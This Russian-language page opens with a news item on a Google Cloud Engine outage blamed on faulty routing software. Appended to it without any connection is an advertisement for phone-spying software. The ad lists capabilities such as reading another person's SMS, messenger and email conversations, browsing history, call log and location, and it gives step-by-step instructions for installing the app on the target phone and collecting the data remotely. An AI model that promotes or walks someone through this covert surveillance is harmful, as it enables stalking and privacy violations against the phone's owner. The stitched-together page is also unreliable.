Работа сервиса Google Cloud Engine прервалась на несколько часов

13e00ecc18239c970dd6e71b16877397

19 февраля случился первый серьёзный сбой в Google Cloud Engine с момента запуска этого облачного сервиса. Пользователи, среди которых были и корпоративные клиенты, на несколько часов оказались отключёнными от GCE. Не получалось авторизоваться в системе, а также получить доступ к требуемым внутренним ресурсам. Первоначально во многих пользовательских блогах появлялись сообщения о том, что причина кроется в хакерской атаке DDoS, которая была планомерно проведена на ресурсы компании. Затем оказалось, что всё это носит исключительно внутренний характер.

Корпорация Google в тот же день опубликовала в своём блоге заметку под номером 15045 (порядковый номер записей, или инцидента). В ней сообщается, что проблема существовала около двух часов. Расследование, которое окончательно ещё не завершено, показало наличие дефектных элементов в коде программного обеспечения, установленного на этих серверах. Виртуальная сеть GCE работает на специально разработанном ПО, которое не имеет контактов с остальными ячейками сервиса. Это сделано именно для того, чтобы злоумышленники не смогли скомпрометировать систему в результате атаки.

В итоге программа сервиса Cloud Engine внезапно прекратила обновлять информацию, связанную с маршрутизацией серверов. Исходящий трафик перестал отправляться в нужном количестве, а в какой-то момент целевые запросы и вовсе оборвались. Оставалась информация в кэше системы, которая некоторое время всё-таки позволяла сервису работать. Затем срок её годности подошёл к завершению, что и привело к окончательному обрыву соединения.

Как сообщает в отчёте Google, работоспособность GCE можно назвать неприемлемой за последние сутки. Оканчивалась заметка информацией о том, что инженеры компании работают над исправлением ошибок, а также обещают клиентам не допускать подобной ситуации в будущем. Предыдущие сбои Cloud Engine, хоть и имели место быть, обычно не превышали нескольких минут времени.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.